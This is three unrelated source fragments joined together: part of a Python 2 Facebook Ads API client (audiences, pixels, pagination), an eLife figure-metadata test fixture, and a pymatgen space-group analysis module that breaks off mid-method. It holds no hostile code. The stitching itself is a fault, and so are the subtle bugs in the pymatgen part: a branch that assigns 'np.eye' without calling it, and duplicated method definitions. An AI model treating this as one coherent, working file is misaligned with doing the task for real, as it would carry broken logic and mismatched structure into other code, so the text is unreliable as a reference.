args['bid_info'] = json.dumps(bid_info)
if creative_id:
args['creative'] = json.dumps({'creative_id': creative_id})
if tracking_specs:
args['tracking_specs'] = json.dumps(tracking_specs)
if view_tags:
args['view_tags'] = json.dumps(view_tags)
if objective:
args['objective'] = objective
if adgroup_status:
args['adgroup_status'] = adgroup_status
if targeting:
args['targeting'] = json.dumps(targeting)
if conversion_specs:
args['conversion_specs'] = json.dumps(conversion_specs)
return self.make_request(path, 'POST', args, batch=batch)
def create_custom_audience(self, account_id, name, subtype=None,
description=None, rule=None, opt_out_link=None,
retention_days=30, batch=False):
"""Create a custom audience for the given account."""
path = "act_%s/customaudiences" % account_id
args = {
'name': name,
}
if subtype:
args['subtype'] = subtype
if description:
args['description'] = description
if rule:
args['rule'] = json.dumps(rule)
if opt_out_link:
args['opt_out_link'] = opt_out_link
if retention_days:
args['retention_days'] = retention_days
return self.make_request(path, 'POST', args, batch=batch)
def add_users_to_custom_audience(self, custom_audience_id, tracking_ids,
schema='MOBILE_ADVERTISER_ID', app_ids=None, batch=False):
"""
Adds users to a Custom Audience, based on a list of unique user
tracking ids. There is a limit imposed by Facebook that only 10000
users may be uploaded at a time.
@param schema Allowed values are "UID", "EMAIL_SHA256", "PHONE_SHA256",
"MOBILE_ADVERTISER_ID"
@param app_ids List of app ids. This is required for schema type UID, as of API v2.2
"""
path = "%s/users" % custom_audience_id
payload = {'schema': schema, 'data': tracking_ids}
if app_ids:
payload['app_ids'] = app_ids
args = {
'payload': json.dumps(payload)
}
return self.make_request(path, 'POST', args, batch)
def create_custom_audience_pixel(self, account_id, batch=False):
"""Create a custom audience pixel for the given account.
This method only needed once per ad account."""
path = "act_%s/adspixels" % account_id
return self.make_request(path, 'POST', batch=batch)
def create_custom_audience_from_website(
self, account_id, name, domain, description=None,
retention_days=30, prefill=True, batch=False):
"""Create a custom audience from website for the given account."""
path = "act_%s/customaudiences" % account_id
args = {
'name': name,
'subtype': "WEBSITE"
}
rule = {'url': {
'i_contains': domain,
}}
if rule:
args['rule'] = json.dumps(rule)
if retention_days:
args['retention_days'] = retention_days
if prefill:
args['prefill'] = prefill
return self.make_request(path, 'POST', args, batch=batch)
def create_lookalike_audience(self, account_id, name, audience_id,
lookalike_spec, batch=False):
"""Create a lookalike audience for the given target audience."""
path = "act_%s/customaudiences" % account_id
args = {
'name': name,
'origin_audience_id': audience_id,
'lookalike_spec': json.dumps(lookalike_spec),
}
return self.make_request(path, 'POST', args, batch)
def create_offsite_pixel(self, account_id, name, tag, batch=False):
"""Creates an offsite pixel for the given account."""
path = 'act_%s/offsitepixels' % account_id
args = {
'name': name,
'tag': tag,
}
return self.make_request(path, 'POST', args, batch=batch)
def get_connection_objects(self, account_id,
business_id=None, batch=False):
"""
Returns facebook connection objects for given account
Params:
business_id - restrict query to particular business
"""
path = 'act_{}/connectionobjects'.format(account_id)
args = {}
if business_id:
args['business_id'] = business_id
return self.make_request(path, 'GET', args, batch=batch)
def get_broad_targeting_categories(self, account_id,
user_adclusters=None,
excluded_user_adclusters=None,
batch=False):
"""
Get broad targeting categories for the given account
Params:
user_adclusters - Array of ID-name pairs to include.
excluded_user_adclusters - Array of ID-name pairs to exclude
"""
path = 'act_{}/broadtargetingcategories'.format(account_id)
args = {}
if user_adclusters:
args['user_adclusters'] = user_adclusters
if excluded_user_adclusters:
args['excluded_user_adclusters'] = excluded_user_adclusters
return self.make_request(path, 'GET', args, batch=batch)
def __parse_time(self, time_obj):
"""Internal function to transform user supplied time objects into Unix time."""
if time_obj:
resp = ''
if isinstance(time_obj, int) or isinstance(time_obj, str):
resp = time_obj
elif isinstance(time_obj, datetime.datetime):
resp = calendar.timegm(time_obj.timetuple())
else:
raise Exception("Unknown __parse_time format for {0}".format(time_obj))
return str(resp)
return None
def iterate_by_page(response):
"""
Generator function that will return one Facebook results page at a time
Note: Other than ensuring we don't crash, we accept facebook responses
regardless of whether they contain paging information or not.
Params:
response - A Facebook Ads API response body that includes pagination
sections.
Yields:
An unadultered page of Facebook response data, including data and any
provided pagination info.
"""
response = response
while True:
yield response
next_page = response.get('paging', {}).get('next', '')
if not next_page:
break
response = json.load(urllib2.urlopen(next_page))
def iterate_by_item(response):
"""
Generator function that will return one Facebook results item at a time
Note: Other than ensuring we don't crash, we accept facebook responses
regardless of whether they contain paging information or not.
Params:
response - A Facebook Ads API response body that includes pagination
sections.
Yields:
An item from the Facebook response data. It will automatically navigate
over any additional pages that Facebook provides.
"""
response = response
while True:
for r in response.get('data', []):
yield r
next_page = response.get('paging', {}).get('next', '')
if not next_page:
break
response = json.load(urllib2.urlopen(next_page))
|
|
# output from elife00013.xml
expected = [
{
"xlink_href": "elife00013f001",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 1,
"parent_sibling_ordinal": 1,
"parent_component_doi": "10.7554/eLife.00013.003",
"position": 1,
"ordinal": 1,
},
{
"xlink_href": "elife00013fs001",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 2,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.004",
"p_parent_type": "fig",
"p_parent_ordinal": 1,
"p_parent_sibling_ordinal": 1,
"p_parent_component_doi": "10.7554/eLife.00013.003",
"position": 2,
"ordinal": 2,
},
{
"xlink_href": "elife00013f002",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 3,
"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.006",
"position": 3,
"ordinal": 3,
},
{
"xlink_href": "elife00013f003",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 4,
"parent_sibling_ordinal": 3,
"parent_component_doi": "10.7554/eLife.00013.008",
"position": 4,
"ordinal": 4,
},
{
"xlink_href": "elife00013fs002",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 5,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.009",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 5,
"ordinal": 5,
},
{
"xlink_href": "elife00013fs003",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 6,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 3,
"parent_component_doi": "10.7554/eLife.00013.010",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 6,
"ordinal": 6,
},
{
"xlink_href": "elife00013fs004",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 7,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 4,
"parent_component_doi": "10.7554/eLife.00013.011",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 7,
"ordinal": 7,
},
{
"xlink_href": "elife00013fs005",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 8,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 5,
"parent_component_doi": "10.7554/eLife.00013.012",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 8,
"ordinal": 8,
},
{
"xlink_href": "elife00013fs006",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 9,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 6,
"parent_component_doi": "10.7554/eLife.00013.013",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 9,
"ordinal": 9,
},
{
"xlink_href": "elife00013fs007",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 10,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 7,
"parent_component_doi": "10.7554/eLife.00013.014",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 10,
"ordinal": 10,
},
{
"xlink_href": "elife00013fs008",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 11,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 8,
"parent_component_doi": "10.7554/eLife.00013.015",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 11,
"ordinal": 11,
},
{
"xlink_href": "elife00013fs009",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 12,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 9,
"parent_component_doi": "10.7554/eLife.00013.016",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 12,
"ordinal": 12,
},
{
"xlink_href": "elife00013fs010",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 13,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 10,
"parent_component_doi": "10.7554/eLife.00013.017",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 13,
"ordinal": 13,
},
{
"xlink_href": "elife00013fs011",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 14,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 11,
"parent_component_doi": "10.7554/eLife.00013.018",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 14,
"ordinal": 14,
},
{
"xlink_href": "elife00013fs012",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 15,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 12,
"parent_component_doi": "10.7554/eLife.00013.019",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 15,
"ordinal": 15,
},
{
"xlink_href": "elife00013fs013",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 16,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 13,
"parent_component_doi": "10.7554/eLife.00013.020",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 16,
"ordinal": 16,
},
{
"xlink_href": "elife00013fs014",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 17,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 14,
"parent_component_doi": "10.7554/eLife.00013.021",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 17,
"ordinal": 17,
},
{
"xlink_href": "elife00013fs015",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 18,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 15,
"parent_component_doi": "10.7554/eLife.00013.022",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 18,
"ordinal": 18,
},
{
"xlink_href": "elife00013fs016",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 19,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 16,
"parent_component_doi": "10.7554/eLife.00013.023",
"p_parent_type": "fig",
"p_parent_ordinal": 4,
"p_parent_sibling_ordinal": 3,
"p_parent_component_doi": "10.7554/eLife.00013.008",
"position": 19,
"ordinal": 19,
},
{
"xlink_href": "elife00013f004",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 20,
"parent_sibling_ordinal": 4,
"parent_component_doi": "10.7554/eLife.00013.025",
"position": 20,
"ordinal": 20,
},
{
"xlink_href": "elife00013fs017",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 21,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.026",
"p_parent_type": "fig",
"p_parent_ordinal": 20,
"p_parent_sibling_ordinal": 4,
"p_parent_component_doi": "10.7554/eLife.00013.025",
"position": 21,
"ordinal": 21,
},
{
"xlink_href": "elife00013fs018",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 22,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 3,
"parent_component_doi": "10.7554/eLife.00013.027",
"p_parent_type": "fig",
"p_parent_ordinal": 20,
"p_parent_sibling_ordinal": 4,
"p_parent_component_doi": "10.7554/eLife.00013.025",
"position": 22,
"ordinal": 22,
},
{
"xlink_href": "elife00013fs019",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 23,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 4,
"parent_component_doi": "10.7554/eLife.00013.028",
"p_parent_type": "fig",
"p_parent_ordinal": 20,
"p_parent_sibling_ordinal": 4,
"p_parent_component_doi": "10.7554/eLife.00013.025",
"position": 23,
"ordinal": 23,
},
]
|
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals, print_function
import itertools
import logging
from collections import defaultdict
import math
from math import cos
from math import sin
from fractions import Fraction
import numpy as np
from six.moves import filter, map, zip
from monty.dev import deprecated
import spglib
from pymatgen.core.structure import Structure
from pymatgen.symmetry.structure import SymmetrizedStructure
from pymatgen.core.lattice import Lattice
from pymatgen.core.structure import PeriodicSite
from pymatgen.core.operations import SymmOp
from pymatgen.util.coord_utils import find_in_coord_list, pbc_diff
"""
An interface to the excellent spglib library by Atsushi Togo
(http://spglib.sourceforge.net/) for pymatgen.
v1.0 - Now works with both ordered and disordered structure.
v2.0 - Updated for spglib 1.6.
v3.0 - pymatgen no longer ships with spglib. Instead, spglib (the python
version) is now a dependency and the SpacegroupAnalyzer merely serves
as an interface to spglib for pymatgen Structures.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "3.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "May 14, 2016"
logger = logging.getLogger(__name__)
class SpacegroupAnalyzer(object):
"""
Takes a pymatgen.core.structure.Structure object and a symprec.
Uses pyspglib to perform various symmetry finding operations.
Args:
structure (Structure/IStructure): Structure to find symmetry
symprec (float): Tolerance for symmetry finding. Defaults to 1e-3,
which is fairly strict and works well for properly refined
structures with atoms in the proper symmetry coordinates. For
structures with slight deviations from their proper atomic
positions (e.g., structures relaxed with electronic structure
codes), a looser tolerance of 0.1 (the value used in Materials
Project) is often needed.
angle_tolerance (float): Angle tolerance for symmetry finding.
"""
def __init__(self, structure, symprec=1e-3, angle_tolerance=5):
self._symprec = symprec
self._angle_tol = angle_tolerance
self._structure = structure
latt = structure.lattice.matrix
positions = structure.frac_coords
unique_species = []
zs = []
magmoms = []
for species, g in itertools.groupby(structure,
key=lambda s: s.species_and_occu):
if species in unique_species:
ind = unique_species.index(species)
zs.extend([ind + 1] * len(tuple(g)))
else:
unique_species.append(species)
zs.extend([len(unique_species)] * len(tuple(g)))
for site in structure:
if hasattr(site, 'magmom'):
magmoms.append(site.magmom)
elif site.is_ordered and hasattr(site.specie, 'spin'):
magmoms.append(site.specie.spin)
else:
magmoms.append(0)
self._unique_species = unique_species
self._numbers = zs
# For now, we are setting magmom to zero.
self._cell = latt, positions, zs, magmoms
self._space_group_data = spglib.get_symmetry_dataset(
self._cell, symprec=self._symprec, angle_tolerance=angle_tolerance)
@deprecated(message="get_spacegroup has been renamed "
"get_space_group_operations. Will be removed in "
"pymatgen 2018.01.01.")
def get_space_group(self):
"""
Get the SpacegroupOperations for the Structure.
Returns:
SpacgroupOperations object.
"""
return self.get_space_group_operations()
@deprecated(message="get_spacegroup_symbol has been renamed "
"get_space_group_symbol. Will be removed in "
"pymatgen 2018.01.01.")
def get_space_group_symbol(self):
"""
Get the spacegroup symbol (e.g., Pnma) for structure.
Returns:
(str): Spacegroup symbol for structure.
"""
return self._space_group_data["international"]
@deprecated(message="get_spacegroup_number has been renamed "
"get_space_group_number. Will be removed in "
"pymatgen 2018.01.01.")
def get_space_group_number(self):
"""
Get the international spacegroup number (e.g., 62) for structure.
Returns:
(int): International spacegroup number for structure.
"""
return int(self._space_group_data["number"])
def get_space_group_operations(self):
"""
Get the SpacegroupOperations for the Structure.
Returns:
SpacgroupOperations object.
"""
return SpacegroupOperations(self.get_space_group_symbol(),
self.get_space_group_number(),
self.get_symmetry_operations())
def get_space_group_symbol(self):
"""
Get the spacegroup symbol (e.g., Pnma) for structure.
Returns:
(str): Spacegroup symbol for structure.
"""
return self._space_group_data["international"]
def get_space_group_number(self):
"""
Get the international spacegroup number (e.g., 62) for structure.
Returns:
(int): International spacegroup number for structure.
"""
return int(self._space_group_data["number"])
def get_hall(self):
"""
Returns Hall symbol for structure.
Returns:
(str): Hall symbol
"""
return self._space_group_data["hall"]
@deprecated(message="get_point_group has been renamed "
"get_point_group_symbol. Will be removed in "
"pymatgen 2018.01.01.")
def get_point_group(self):
return self.get_point_group_symbol()
def get_point_group_symbol(self):
"""
Get the point group associated with the structure.
Returns:
(Pointgroup): Point group for structure.
"""
rotations = self._space_group_data["rotations"]
# passing a 0-length rotations list to spglib can segfault
if len(rotations) == 0:
return '1'
return spglib.get_pointgroup(rotations)[0].strip()
def get_crystal_system(self):
"""
Get the crystal system for the structure, e.g., (triclinic,
orthorhombic, cubic, etc.).
Returns:
(str): Crystal system for structure.
"""
n = self._space_group_data["number"]
f = lambda i, j: i <= n <= j
cs = {"triclinic": (1, 2), "monoclinic": (3, 15),
"orthorhombic": (16, 74), "tetragonal": (75, 142),
"trigonal": (143, 167), "hexagonal": (168, 194),
"cubic": (195, 230)}
crystal_sytem = None
for k, v in cs.items():
if f(*v):
crystal_sytem = k
break
return crystal_sytem
def get_lattice_type(self):
"""
Get the lattice for the structure, e.g., (triclinic,
orthorhombic, cubic, etc.).This is the same than the
crystal system with the exception of the hexagonal/rhombohedral
lattice
Returns:
(str): Lattice type for structure.
"""
n = self._space_group_data["number"]
system = self.get_crystal_system()
if n in [146, 148, 155, 160, 161, 166, 167]:
return "rhombohedral"
elif system == "trigonal":
return "hexagonal"
else:
return system
def get_symmetry_dataset(self):
"""
Returns the symmetry dataset as a dict.
Returns:
(dict): With the following properties:
number: International space group number
international: International symbol
hall: Hall symbol
transformation_matrix: Transformation matrix from lattice of
input cell to Bravais lattice L^bravais = L^original * Tmat
origin shift: Origin shift in the setting of "Bravais lattice"
rotations, translations: Rotation matrices and translation
vectors. Space group operations are obtained by
[(r,t) for r, t in zip(rotations, translations)]
wyckoffs: Wyckoff letters
"""
return self._space_group_data
def _get_symmetry(self):
"""
Get the symmetry operations associated with the structure.
Returns:
Symmetry operations as a tuple of two equal length sequences.
(rotations, translations). "rotations" is the numpy integer array
of the rotation matrices for scaled positions
"translations" gives the numpy float64 array of the translation
vectors in scaled positions.
"""
d = spglib.get_symmetry(self._cell, symprec=self._symprec,
angle_tolerance=self._angle_tol)
# Sometimes spglib returns small translation vectors, e.g.
# [1e-4, 2e-4, 1e-4]
# (these are in fractional coordinates, so should be small denominator
# fractions)
trans = []
for t in d["translations"]:
trans.append([float(Fraction.from_float(c).limit_denominator(1000))
for c in t])
trans = np.array(trans)
# fractional translations of 1 are more simply 0
trans[np.abs(trans) == 1] = 0
return d["rotations"], trans
def get_symmetry_operations(self, cartesian=False):
"""
Return symmetry operations as a list of SymmOp objects.
By default returns fractional coord symmops.
But cartesian can be returned too.
Returns:
([SymmOp]): List of symmetry operations.
"""
rotation, translation = self._get_symmetry()
symmops = []
mat = self._structure.lattice.matrix.T
invmat = np.linalg.inv(mat)
for rot, trans in zip(rotation, translation):
if cartesian:
rot = np.dot(mat, np.dot(rot, invmat))
trans = np.dot(trans, self._structure.lattice.matrix)
op = SymmOp.from_rotation_and_translation(rot, trans)
symmops.append(op)
return symmops
def get_point_group_operations(self, cartesian=False):
"""
Return symmetry operations as a list of SymmOp objects.
By default returns fractional coord symmops.
But cartesian can be returned too.
Args:
cartesian (bool): Whether to return SymmOps as cartesian or
direct coordinate operations.
Returns:
([SymmOp]): List of point group symmetry operations.
"""
rotation, translation = self._get_symmetry()
symmops = []
mat = self._structure.lattice.matrix.T
invmat = np.linalg.inv(mat)
for rot in rotation:
if cartesian:
rot = np.dot(mat, np.dot(rot, invmat))
op = SymmOp.from_rotation_and_translation(rot, np.array([0, 0, 0]))
symmops.append(op)
return symmops
def get_symmetrized_structure(self):
"""
Get a symmetrized structure. A symmetrized structure is one where the
sites have been grouped into symmetrically equivalent groups.
Returns:
:class:`pymatgen.symmetry.structure.SymmetrizedStructure` object.
"""
ds = self.get_symmetry_dataset()
sg = SpacegroupOperations(self.get_space_group_symbol(),
self.get_space_group_number(),
self.get_symmetry_operations())
return SymmetrizedStructure(self._structure, sg,
ds["equivalent_atoms"],
ds["wyckoffs"])
def get_refined_structure(self):
"""
Get the refined structure based on detected symmetry. The refined
structure is a *conventional* cell setting with atoms moved to the
expected symmetry positions.
Returns:
Refined structure.
"""
# Atomic positions have to be specified by scaled positions for spglib.
lattice, scaled_positions, numbers \
= spglib.refine_cell(self._cell, self._symprec, self._angle_tol)
species = [self._unique_species[i - 1] for i in numbers]
s = Structure(lattice, species, scaled_positions)
return s.get_sorted_structure()
def find_primitive(self):
"""
Find a primitive version of the unit cell.
Returns:
A primitive cell in the input cell is searched and returned
as an Structure object. If no primitive cell is found, None is
returned.
"""
lattice, scaled_positions, numbers = spglib.find_primitive(
self._cell, symprec=self._symprec)
species = [self._unique_species[i - 1] for i in numbers]
return Structure(lattice, species, scaled_positions,
to_unit_cell=True).get_reduced_structure()
def get_ir_reciprocal_mesh(self, mesh=(10, 10, 10), is_shift=(0, 0, 0)):
"""
k-point mesh of the Brillouin zone generated taken into account
symmetry.The method returns the irreducible kpoints of the mesh
and their weights
Args:
mesh (3x1 array): The number of kpoint for the mesh needed in
each direction
is_shift (3x1 array): Whether to shift the kpoint grid. (1, 1,
1) means all points are shifted by 0.5, 0.5, 0.5.
Returns:
A list of irreducible kpoints and their weights as a list of
tuples [(ir_kpoint, weight)], with ir_kpoint given
in fractional coordinates
"""
shift = np.array([1 if i else 0 for i in is_shift])
mapping, grid = spglib.get_ir_reciprocal_mesh(
np.array(mesh), self._cell, is_shift=shift, symprec=self._symprec)
results = []
tmp_map = list(mapping)
for i in np.unique(mapping):
results.append(((grid[i] + shift * (0.5, 0.5, 0.5)) / mesh,
tmp_map.count(i)))
return results
def get_primitive_standard_structure(self, international_monoclinic=True):
"""
Gives a structure with a primitive cell according to certain standards
the standards are defined in Setyawan, W., & Curtarolo, S. (2010).
High-throughput electronic band structure calculations:
Challenges and tools. Computational Materials Science,
49(2), 299-312. doi:10.1016/j.commatsci.2010.05.010
Returns:
The structure in a primitive standardized cell
"""
conv = self.get_conventional_standard_structure(
international_monoclinic=international_monoclinic)
lattice = self.get_lattice_type()
if "P" in self.get_space_group_symbol() or lattice == "hexagonal":
return conv
if lattice == "rhombohedral":
# check if the conventional representation is hexagonal or
# rhombohedral
lengths, angles = conv.lattice.lengths_and_angles
if abs(lengths[0]-lengths[2]) < 0.0001:
transf = np.eye
else:
transf = np.array([[-1, 1, 1], [2, 1, 1], [-1, -2, 1]],
dtype=np.float) / 3
elif "I" in self.get_space_group_symbol():
transf = np.array([[-1, 1, 1], [1, -1, 1], [1, 1, -1]],
dtype=np.float) / 2
elif "F" in self.get_space_group_symbol():
transf = np.array([[0, 1, 1], [1, 0, 1], [1, 1, 0]],
dtype=np.float) / 2
elif "C" in self.get_space_group_symbol():
if self.get_crystal_system() == "monoclinic":
transf = np.array([[1, 1, 0], [-1, 1, 0], [0, 0, 2]],
dtype=np.float) / 2
else:
transf = np.array([[1, -1, 0], [1, 1, 0], [0, 0, 2]],
dtype=np.float) / 2
else:
transf = np.eye(3)
new_sites = []
latt = Lattice(np.dot(transf, conv.lattice.matrix))
for s in conv:
new_s = PeriodicSite(
s.specie, s.coords, latt,
to_unit_cell=True, coords_are_cartesian=True,
properties=s.properties)
if not any(map(new_s.is_periodic_image, new_sites)):
new_sites.append(new_s)
if lattice == "rhombohedral":
prim = Structure.from_sites(new_sites)
lengths, angles = prim.lattice.lengths_and_angles
a = lengths[0]
alpha = math.pi * angles[0] / 180
new_matrix = [
[a * cos(alpha / 2), -a * sin(alpha / 2), 0],
[a * cos(alpha / 2), a * sin(alpha / 2), 0],
[a * cos(alpha) / cos(alpha / 2), 0,
a * math.sqrt(1 - (cos(alpha) ** 2 / (cos(alpha / 2) ** 2)))]]
new_sites = []
latt = Lattice(new_matrix)
for s in prim:
new_s = PeriodicSite(
s.specie, s.frac_coords, latt,
to_unit_cell=True, properties=s.properties)
if not any(map(new_s.is_periodic_image, new_sites)):
new_sites.append(new_s)
return Structure.from_sites(new_sites)
return Structure.from_sites(new_sites)
def get_conventional_standard_structure(
self, international_monoclinic=True):
"""
Gives a structure with a conventional cell according to certain
standards. The standards are defined in Setyawan, W., & Curtarolo,
S. (2010). High-throughput electronic band structure calculations:
Challenges and tools. Computational Materials Science,
49(2), 299-312. doi:10.1016/j.commatsci.2010.05.010
They basically enforce as much as possible
norm(a1)<norm(a2)<norm(a3)
Returns:
The structure in a conventional standardized cell
"""
tol = 1e-5
struct = self.get_refined_structure()
latt = struct.lattice
latt_type = self.get_lattice_type()
sorted_lengths = sorted(latt.abc)
sorted_dic = sorted([{'vec': latt.matrix[i],
'length': latt.abc[i],
'orig_index': i} for i in [0, 1, 2]],
key=lambda k: k['length'])
if latt_type in ("orthorhombic", "cubic"):
# you want to keep the c axis where it is
# to keep the C- settings
transf = np.zeros(shape=(3, 3))
if self.get_space_group_symbol().startswith("C"):
transf[2] = [0, 0, 1]
a, b = sorted(latt.abc[:2])
sorted_dic = sorted([{'vec': latt.matrix[i],
'length': latt.abc[i],
'orig_index': i} for i in [0, 1]],
key=lambda k: k['length'])
for i in range(2):
transf[i][sorted_dic[i]['orig_index']] = 1
c = latt.abc[2]
else:
for i in range(len(sorted_dic)):
transf[i][sorted_dic[i]['orig_index']] = 1
a, b, c = sorted_lengths
latt = Lattice.orthorhombic(a, b, c)
elif latt_type == "tetragonal":
# find the "a" vectors
# it is basically the vector repeated two times
transf = np.zeros(shape=(3, 3))
a, b, c = sorted_lengths
for d in range(len(sorted_dic)):
transf[d][sorted_dic[d]['orig_index']] = 1
if abs(b - c) < tol:
a, c = c, a
transf = np.dot([[0, 0, 1], [0, 1, 0], [1, 0, 0]], transf)
latt = Lattice.tetragonal(a, c)
elif latt_type in ("hexagonal", "rhombohedral"):
# for the conventional cell representation,
# we allways show the rhombohedral lattices as hexagonal
# check first if we have the refined structure shows a rhombohedral
# cell
# if so, make a supercell
a, b, c = latt.abc
if np.all(np.abs([a - b, c - b, a - c]) < 0.001):
struct.make_supercell(((1, -1, 0), (0, 1, -1), (1, 1, 1)))
a, b, c = sorted(struct.lattice.abc)
if abs(b - c) < 0.001:
a, c = c, a
new_matrix = [[a / 2, -a * math.sqrt(3) / 2, 0],
[a / 2, a * math.sqrt(3) / 2, 0],
[0, 0, c]]
latt = Lattice(new_matrix)
transf = np.eye(3, 3)
elif latt_type == "monoclinic":
# You want to keep the c axis where it is to keep the C- settings
if self.get_space_group_operations().int_symbol.startswith("C"):
transf = np.zeros(shape=(3, 3))
transf[2] = [0, 0, 1]
sorted_dic = sorted([{'vec': latt.matrix[i],
'length': latt.abc[i],
'orig_index': i} for i in [0, 1]],
key=lambda k: k['length'])
a = sorted_dic[0]['length']
b = sorted_dic[1]['length']
c = latt.abc[2]
new_matrix = None
for t in itertools.permutations(list(range(2)), 2):
m = latt.matrix
landang = Lattice(
[m[t[0]], m[t[1]], m[2]]).lengths_and_angles
if landang[1][0] > 90:
# if the angle is > 90 we invert a and b to get
# an angle < 90
landang = Lattice(
[-m[t[0]], -m[t[1]], m[2]]).lengths_and_angles
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = -1
transf[1][t[1]] = -1
transf[2][2] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
continue
elif landang[1][0] < 90:
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = 1
transf[1][t[1]] = 1
transf[2][2] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
if new_matrix is None:
# this if is to treat the case
# where alpha==90 (but we still have a monoclinic sg
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, 0, c]]
transf = np.zeros(shape=(3, 3))
for c in range(len(sorted_dic)):
transf[c][sorted_dic[c]['orig_index']] = 1
#if not C-setting
else:
# try all permutations of the axis
# keep the ones with the non-90 angle=alpha
# and b<c
new_matrix = None
for t in itertools.permutations(list(range(3)), 3):
m = latt.matrix
landang = Lattice(
[m[t[0]], m[t[1]], m[t[2]]]).lengths_and_angles
if landang[1][0] > 90 and landang[0][1] < landang[0][2]:
landang = Lattice(
[-m[t[0]], -m[t[1]], m[t[2]]]).lengths_and_angles
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = -1
transf[1][t[1]] = -1
transf[2][t[2]] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
continue
elif landang[1][0] < 90 and landang[0][1] < landang[0][2]:
transf = np.zeros(shape=(3, 3))
transf[0][t[0]] = 1
